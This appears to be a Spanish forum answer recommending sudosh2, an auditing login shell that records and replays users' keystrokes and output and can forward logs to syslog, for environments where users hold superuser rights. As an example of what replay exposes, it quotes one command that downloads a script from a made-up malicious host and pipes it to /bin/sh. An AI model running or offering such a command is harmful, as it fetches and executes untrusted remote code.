¡Confiar pero verificar!
Echa un vistazo a sudosh2 . sudosh2 es proporcionado por los puertos de FreeBSD. Los paquetes están disponibles para RedHat y Ubuntu. Aquí está la descripción de su sitio web:
sudosh es un filtro de shell de auditoría y se puede utilizar como shell de inicio de sesión. Sudosh registra todas las pulsaciones de teclas y salidas y puede reproducir la sesión como si fuera una videograbadora.
Sudosh le permitirá reproducir la sesión del usuario, lo que le permitirá ver todas las entradas y salidas tal como las vio el usuario. Puede ver todo, pulsaciones de teclas, errores tipográficos, espacios de retroceso, en qué editaron vi
, la salida de wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh
, etc.
Es posible enviar registros sudosh a syslog, para que puedan almacenarse en un servidor central de syslog alejado del sistema.
Tenga en cuenta que sudosh2 es un reemplazo para sudosh, que fue abandonado por su autor
¿Trabaja en una institución académica donde los usuarios insisten en tener privilegios de superusuario? ¿O trabaja en una corporación y desea permitir que los usuarios tengan privilegios de superusuario en sus propias máquinas virtuales? Esta podría ser la solución para ti.